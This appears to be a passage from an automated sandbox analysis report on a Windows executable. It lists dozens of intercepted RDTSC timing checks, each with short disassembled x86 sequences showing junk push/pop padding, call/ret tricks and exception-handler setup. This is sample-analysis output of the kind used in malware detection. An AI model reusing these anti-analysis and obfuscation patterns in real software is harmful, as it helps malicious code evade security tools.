                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11766FB second address: 1176701 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1176701 second address: 1176707 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1176931 second address: 117693B instructions: 0x00000000 rdtsc 0x00000002 ja 00007F65CD2EDEE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 117693B second address: 1176945 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F65CC527C9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11779ED second address: 11779F3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11779F3 second address: 11779FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F65CC527C96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11789E4 second address: 11789E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1179581 second address: 1179586 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1179263 second address: 1179268 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1179268 second address: 1179288 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F65CC527CA6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1179288 second address: 11792A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65CD2EDEF7h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 117C122 second address: 117C197 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jmp 00007F65CC527C9Eh 0x0000000e push 00000000h 0x00000010 adc esi, 6DB4148Fh 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push edi 0x0000001b call 00007F65CC527C98h 0x00000020 pop edi 0x00000021 mov dword ptr [esp+04h], edi 0x00000025 add dword ptr [esp+04h], 00000014h 0x0000002d inc edi 0x0000002e push edi 0x0000002f ret 0x00000030 pop edi 0x00000031 ret 0x00000032 or dword ptr [ebp+122D2391h], ebx 0x00000038 jne 00007F65CC527C9Ch 0x0000003e jo 00007F65CC527C9Ch 0x00000044 add esi, dword ptr [ebp+122D35C9h] 0x0000004a xchg eax, ebx 0x0000004b push eax 0x0000004c push edx 0x0000004d ja 00007F65CC527CA7h 0x00000053 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 117C197 second address: 117C1A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 117C909 second address: 117C90E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 118069F second address: 11806A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 118175F second address: 11817FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CC527CA4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F65CC527C98h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 jg 00007F65CC527C9Ch 0x0000002c push dword ptr fs:[00000000h] 0x00000033 and di, B026h 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f mov eax, dword ptr [ebp+122D1195h] 0x00000045 push 00000000h 0x00000047 push edx 0x00000048 call 00007F65CC527C98h 0x0000004d pop edx 0x0000004e mov dword ptr [esp+04h], edx 0x00000052 add dword ptr [esp+04h], 0000001Ch 0x0000005a inc edx 0x0000005b push edx 0x0000005c ret 0x0000005d pop edx 0x0000005e ret 0x0000005f mov edi, dword ptr [ebp+122D324Ah] 0x00000065 push FFFFFFFFh 0x00000067 mov ebx, eax 0x00000069 push eax 0x0000006a push eax 0x0000006b push edx 0x0000006c push eax 0x0000006d push edx 0x0000006e jne 00007F65CC527C96h 0x00000074 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11827FE second address: 1182804 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1183713 second address: 1183717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 113B1DE second address: 113B1FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CD2EDEEFh 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007F65CD2EDEE6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11817FB second address: 1181805 instructions: 0x00000000 rdtsc 0x00000002 je 00007F65CC527C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1183717 second address: 118371B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 118371B second address: 1183721 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1183721 second address: 1183727 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 118783E second address: 1187849 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1186A92 second address: 1186A96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1187849 second address: 11878B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65CC527C9Dh 0x00000009 popad 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jng 00007F65CC527C96h 0x00000013 popad 0x00000014 popad 0x00000015 nop 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007F65CC527C98h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 0000001Dh 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 push 00000000h 0x00000032 push ebx 0x00000033 mov ebx, edx 0x00000035 pop edi 0x00000036 ja 00007F65CC527C9Ch 0x0000003c push 00000000h 0x0000003e add bl, FFFFFF91h 0x00000041 xchg eax, esi 0x00000042 pushad 0x00000043 pushad 0x00000044 jmp 00007F65CC527C9Dh 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1186A96 second address: 1186AA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007F65CD2EDEE6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11878B5 second address: 11878BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1186AA5 second address: 1186B26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 stc 0x00000008 push dword ptr fs:[00000000h] 0x0000000f stc 0x00000010 mov dword ptr fs:[00000000h], esp 0x00000017 sub dword ptr [ebp+122D198Dh], ecx 0x0000001d mov di, 7B5Ah 0x00000021 mov eax, dword ptr [ebp+122D0A39h] 0x00000027 push 00000000h 0x00000029 push esi 0x0000002a call 00007F65CD2EDEE8h 0x0000002f pop esi 0x00000030 mov dword ptr [esp+04h], esi 0x00000034 add dword ptr [esp+04h], 00000017h 0x0000003c inc esi 0x0000003d push esi 0x0000003e ret 0x0000003f pop esi 0x00000040 ret 0x00000041 movzx edi, si 0x00000044 sub dword ptr [ebp+122D2EFDh], ebx 0x0000004a push FFFFFFFFh 0x0000004c push 00000000h 0x0000004e push ebx 0x0000004f call 00007F65CD2EDEE8h 0x00000054 pop ebx 0x00000055 mov dword ptr [esp+04h], ebx 0x00000059 add dword ptr [esp+04h], 00000014h 0x00000061 inc ebx 0x00000062 push ebx 0x00000063 ret 0x00000064 pop ebx 0x00000065 ret 0x00000066 sub edi, dword ptr [ebp+122D196Bh] 0x0000006c mov dword ptr [ebp+122D2B99h], edi 0x00000072 mov bh, EEh 0x00000074 nop 0x00000075 pushad 0x00000076 push eax 0x00000077 push edx 0x00000078 push eax 0x00000079 push edx 0x0000007a rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11878BE second address: 11878D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CC527C9Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1186B26 second address: 1186B2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1186B2A second address: 1186B2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1188890 second address: 11888FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jo 00007F65CD2EDEE6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F65CD2EDEE8h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b push 00000000h 0x0000002d clc 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push esi 0x00000033 call 00007F65CD2EDEE8h 0x00000038 pop esi 0x00000039 mov dword ptr [esp+04h], esi 0x0000003d add dword ptr [esp+04h], 0000001Ch 0x00000045 inc esi 0x00000046 push esi 0x00000047 ret 0x00000048 pop esi 0x00000049 ret 0x0000004a mov edi, dword ptr [ebp+122D356Dh] 0x00000050 mov edi, dword ptr [ebp+122D3741h] 0x00000056 xchg eax, esi 0x00000057 pushad 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b popad 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1187A99 second address: 1187AC9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F65CC527CA7h 0x00000008 jmp 00007F65CC527CA1h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F65CC527CA1h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11888FD second address: 1188920 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F65CD2EDEE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F65CD2EDEF3h 0x0000000f popad 0x00000010 push eax 0x00000011 push ecx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1188920 second address: 1188926 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1187AC9 second address: 1187ACD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1187B59 second address: 1187B6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F65CC527C96h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pop eax 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11898B7 second address: 11898C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push ecx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 118A7A4 second address: 118A7AA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 118A7AA second address: 118A7BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F65CD2EDEEEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 118C8BB second address: 118C8C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 118D8D6 second address: 118D8F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F65CD2EDEEFh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 118D8F3 second address: 118D8F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 118D8F8 second address: 118D909 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65CD2EDEEDh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1189997 second address: 11899A1 instructions: 0x00000000 rdtsc 0x00000002 je 00007F65CC527C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11899A1 second address: 1189A48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CD2EDEEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F65CD2EDEE8h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 call 00007F65CD2EDEF9h 0x0000002b sub dword ptr [ebp+122D323Eh], eax 0x00000031 pop edi 0x00000032 mov edi, dword ptr [ebp+122D3785h] 0x00000038 push dword ptr fs:[00000000h] 0x0000003f mov ebx, dword ptr [ebp+122D1964h] 0x00000045 mov dword ptr fs:[00000000h], esp 0x0000004c push 00000000h 0x0000004e push eax 0x0000004f call 00007F65CD2EDEE8h 0x00000054 pop eax 0x00000055 mov dword ptr [esp+04h], eax 0x00000059 add dword ptr [esp+04h], 00000017h 0x00000061 inc eax 0x00000062 push eax 0x00000063 ret 0x00000064 pop eax 0x00000065 ret 0x00000066 mov dword ptr [ebp+122D1BDCh], esi 0x0000006c mov ebx, dword ptr [ebp+122D18FEh] 0x00000072 mov eax, dword ptr [ebp+122D173Dh] 0x00000078 push FFFFFFFFh 0x0000007a mov dword ptr [ebp+122D232Dh], eax 0x00000080 push eax 0x00000081 pushad 0x00000082 push ecx 0x00000083 push eax 0x00000084 push edx 0x00000085 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1189A48 second address: 1189A67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F65CC527CA8h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 118E9CF second address: 118E9D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 118E9D3 second address: 118E9E7 instructions: 0x00000000 rdtsc 0x00000002 js 00007F65CC527C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 118EB7B second address: 118EB81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 118EB81 second address: 118EB85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1190B23 second address: 1190B79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65CD2EDEEFh 0x00000009 popad 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007F65CD2EDEE8h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 push 00000000h 0x0000002a mov dword ptr [ebp+122D3245h], eax 0x00000030 push 00000000h 0x00000032 mov dword ptr [ebp+122D22EDh], edx 0x00000038 xchg eax, esi 0x00000039 push eax 0x0000003a push edx 0x0000003b jo 00007F65CD2EDEECh 0x00000041 jnl 00007F65CD2EDEE6h 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 118EB85 second address: 118EC20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b and di, B17Fh 0x00000010 push dword ptr fs:[00000000h] 0x00000017 mov dword ptr [ebp+122D315Eh], edi 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 push 00000000h 0x00000026 push ebx 0x00000027 call 00007F65CC527C98h 0x0000002c pop ebx 0x0000002d mov dword ptr [esp+04h], ebx 0x00000031 add dword ptr [esp+04h], 0000001Ah 0x00000039 inc ebx 0x0000003a push ebx 0x0000003b ret 0x0000003c pop ebx 0x0000003d ret 0x0000003e jc 00007F65CC527C9Ch 0x00000044 mov edi, dword ptr [ebp+122D3631h] 0x0000004a mov eax, dword ptr [ebp+122D00A5h] 0x00000050 push 00000000h 0x00000052 push ebx 0x00000053 call 00007F65CC527C98h 0x00000058 pop ebx 0x00000059 mov dword ptr [esp+04h], ebx 0x0000005d add dword ptr [esp+04h], 00000019h 0x00000065 inc ebx 0x00000066 push ebx 0x00000067 ret 0x00000068 pop ebx 0x00000069 ret 0x0000006a push FFFFFFFFh 0x0000006c pushad 0x0000006d sub edx, 6CB4EA04h 0x00000073 sub ebx, dword ptr [ebp+122D34E1h] 0x00000079 popad 0x0000007a push eax 0x0000007b push eax 0x0000007c push edx 0x0000007d push eax 0x0000007e push edx 0x0000007f jmp 00007F65CC527C9Dh 0x00000084 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1190B79 second address: 1190B9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CD2EDEF7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 118EC20 second address: 118EC26 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1190B9B second address: 1190BAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CD2EDEEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 118EC26 second address: 118EC2B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1190BAA second address: 1190BB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F65CD2EDEE6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 118FCCD second address: 118FCD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 119841A second address: 1198426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F65CD2EDEF2h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 119CD37 second address: 119CD3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 119CD3B second address: 119CD55 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jng 00007F65CD2EDEE6h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 je 00007F65CD2EDEE8h 0x00000018 push eax 0x00000019 pop eax 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 119CD55 second address: 119CD5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F65CC527C96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 119CD5F second address: 119CD63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 119CD63 second address: 119CD72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 119CD72 second address: 119CD77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 119CEED second address: 119CEF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11A2E72 second address: 11A2E8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F65CD2EDEE6h 0x0000000a jmp 00007F65CD2EDEF3h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11A1B56 second address: 11A1B73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F65CC527CA9h 0x0000000a jmp 00007F65CC527C9Dh 0x0000000f jbe 00007F65CC527C96h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11A1B73 second address: 11A1B90 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 ja 00007F65CD2EDEE6h 0x00000009 jmp 00007F65CD2EDEEBh 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 js 00007F65CD2EDEE6h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11A1B90 second address: 11A1B96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
